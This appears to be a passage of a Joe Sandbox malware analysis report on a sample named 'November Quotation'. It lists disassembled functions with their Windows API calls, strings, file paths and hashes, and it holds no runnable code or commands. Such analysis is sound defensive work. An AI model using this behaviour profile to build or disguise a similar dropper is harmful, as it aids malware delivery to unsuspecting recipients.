                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                              • String ID: 8$C:\Program Files (x86)\Common Files\actionizing.mon$reformandum\desperations\
                                                                                                              • API String ID: 1453599865-1711387181
                                                                                                              • Opcode ID: fa24a900829e58aa854b55985ad0857a7e20b855b9e3e7eff8b1e02e12944b15
                                                                                                              • Instruction ID: 789ffc1fd5c9b2491a3bc3a33d6618758842135b745afe85e879194269bc7d47
                                                                                                              • Opcode Fuzzy Hash: fa24a900829e58aa854b55985ad0857a7e20b855b9e3e7eff8b1e02e12944b15
                                                                                                              • Instruction Fuzzy Hash: FF018071A40604BFD700ABB19E8DEAF7278EF6031AF20453BF142B60C1D6B84991962E
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040406A
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404086
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404092
                                                                                                              • SetBkMode.GDI32(?,?), ref: 0040409E
                                                                                                              • GetSysColor.USER32(?), ref: 004040B1
                                                                                                              • SetBkColor.GDI32(?,?), ref: 004040C1
                                                                                                              • DeleteObject.GDI32(?), ref: 004040DB
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004040E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                                              • Instruction ID: 4290116d03e1e938411804169c88583f7df32a2dcd0dedbcf70a7ff5d4599883
                                                                                                              • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                                              • Instruction Fuzzy Hash: 0F2157B15007049BC7319F68DD48B5B7BF8AF41714F04893DEA95F2691D734D948CB64
                                                                                                              APIs
                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                                                                                • Part of subcall function 00405A90: ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031DB,00000000,00000000,00402FF3,000000FF,00000004,00000000,00000000,00000000), ref: 00405AA4
                                                                                                                • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 1149667376-2366072709
                                                                                                              • Opcode ID: 1ebf7e8ea81d9f721691c6586ac75f819ca406a5e40d7b7a1c139251d0037f51
                                                                                                              • Instruction ID: 712a0fc01c11b6dc7c3c5e68f53f431dee7eef2fa5089cb8e9bfef1fdcaab261
                                                                                                              • Opcode Fuzzy Hash: 1ebf7e8ea81d9f721691c6586ac75f819ca406a5e40d7b7a1c139251d0037f51
                                                                                                              • Instruction Fuzzy Hash: A151EBB1D00219AADF14DFA4DA88AAEB779FF04304F50443BE501B62D0DB759E42CB69
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3294113728-0
                                                                                                              • Opcode ID: 92b666876386d525bd55a3880e5db59432ef194caa30a2c1e9ac3a4c6e417a2c
                                                                                                              • Instruction ID: fe2ca1a255c9cd407b5186cb59bdd4cc2173cf127eb101838ad91b4c2232832b
                                                                                                              • Opcode Fuzzy Hash: 92b666876386d525bd55a3880e5db59432ef194caa30a2c1e9ac3a4c6e417a2c
                                                                                                              • Instruction Fuzzy Hash: BD317F72800118BBDF11AFA5CE49DAF7E79EF09364F24423AF550762D0CA794E418BA9
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404930
                                                                                                              • GetMessagePos.USER32 ref: 00404938
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404952
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404964
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040498A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                                                              • Instruction ID: e09b5cbf994b9d20e684e2691b51e71dfbdbe619cf93b48063de1b345cd00843
                                                                                                              • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                                                              • Instruction Fuzzy Hash: 14015E71940219BADB00DBA4DD85FFFBBBCAF54711F10012BBB50B61C0C7B499018BA4
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                                                                              • MulDiv.KERNEL32(000BD764,00000064,000BE068), ref: 00402CC6
                                                                                                              • wsprintfW.USER32 ref: 00402CD6
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402CE6
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF8
                                                                                                              Strings
                                                                                                              • verifying installer: %d%%, xrefs: 00402CD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-82062127
                                                                                                              • Opcode ID: b579be9e180f96ba16c56fb513ac100cc9f2c07574638d36e797e7726839ab9f
                                                                                                              • Instruction ID: 4408f4c8952a47a194ff67b523293e2f30943602a1885e021f1ba6dd9a58fc5a
                                                                                                              • Opcode Fuzzy Hash: b579be9e180f96ba16c56fb513ac100cc9f2c07574638d36e797e7726839ab9f
                                                                                                              • Instruction Fuzzy Hash: FB016270640208BFEF20AF64DD49FEE3B69BB00309F008439FA06A92D0DBB89555CF59
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401D44
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                              • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID: Calibri
                                                                                                              • API String ID: 3808545654-1409258342
                                                                                                              • Opcode ID: 3f65254f6df241dee570f3d70183f8ea7dab1824b45f5abdba3aefb20010bb6e
                                                                                                              • Instruction ID: 116310afc90cc01f82b49c11926c77c683d1a1b46be819c55f1a02a8d5d7abe2
                                                                                                              • Opcode Fuzzy Hash: 3f65254f6df241dee570f3d70183f8ea7dab1824b45f5abdba3aefb20010bb6e
                                                                                                              • Instruction Fuzzy Hash: DC016D35944640EFEB016BB0AF8AB9A3F74EF55305F104A79F545B62E2CA7804098B2D
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1912718029-0
                                                                                                              • Opcode ID: bd91da1ba0eb139b8caccfea47c3b8adcc0195348a71b7fcd29f2bbb3b0fb127
                                                                                                              • Instruction ID: 2ec885d680f81863ea04f737883acb0357ac6f266bfb4f4db73bac45c1b80bd2
                                                                                                              • Opcode Fuzzy Hash: bd91da1ba0eb139b8caccfea47c3b8adcc0195348a71b7fcd29f2bbb3b0fb127
                                                                                                              • Instruction Fuzzy Hash: AB114671504108FFEF11AF90DE89EAE3B7DEB44348F11007AFA15A10A0D7B59E55AF68
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: aeb2b04795d680d12746b09d9d3076b6a991ad1a912ba314740c9d263e8ce963
                                                                                                              • Instruction ID: a030428118a1c000f424ff4dfb6ba2235896b41d14b08693192eaf3a016f5733
                                                                                                              • Opcode Fuzzy Hash: aeb2b04795d680d12746b09d9d3076b6a991ad1a912ba314740c9d263e8ce963
                                                                                                              • Instruction Fuzzy Hash: 92F0ECB2600508AFDB01DBE4EF88CEEB7BCEB08311B15146AF641F6190DA74AD018B38
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 004048C0
                                                                                                              • wsprintfW.USER32 ref: 004048C9
                                                                                                              • SetDlgItemTextW.USER32(?,0042D1F8), ref: 004048DC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s
                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                              • Opcode ID: 5da30bc4b92d9d0c1cfe05e529173974ba3df4af4940e0a2dfa50fc19328e1e1
                                                                                                              • Instruction ID: 531d837b88f4b702d8d9e34e744ab90cc2584a20199bf08e47c16144e152f227
                                                                                                              • Opcode Fuzzy Hash: 5da30bc4b92d9d0c1cfe05e529173974ba3df4af4940e0a2dfa50fc19328e1e1
                                                                                                              • Instruction Fuzzy Hash: CB11E6736002243BDB10A66D9C4AEDF3659DBC2334F14863BFA25F61D1D978891186E8
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                                • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                                                                • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                                                                • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041AB9A,76F923A0), ref: 004050A6
                                                                                                                • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                              • String ID: OC
                                                                                                              • API String ID: 334405425-1597561874
                                                                                                              • Opcode ID: 297c1825603e8d5f489a2522be40841bd89bd4d7f47841d63e333b39b1ac1a2c
                                                                                                              • Instruction ID: b3ac21fa57660b76ceab9e03e352ea593c7fbc5daa3d747aca45c0be544cf33f
                                                                                                              • Opcode Fuzzy Hash: 297c1825603e8d5f489a2522be40841bd89bd4d7f47841d63e333b39b1ac1a2c
                                                                                                              • Instruction Fuzzy Hash: 3B21A771900215EACF106FA5CE48A9E7EB0AF09354F70423BF610B51E0D7BD8A81DA5D
                                                                                                              APIs
                                                                                                              • SetWindowTextW.USER32(00000000,inelegancy), ref: 00403AD9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
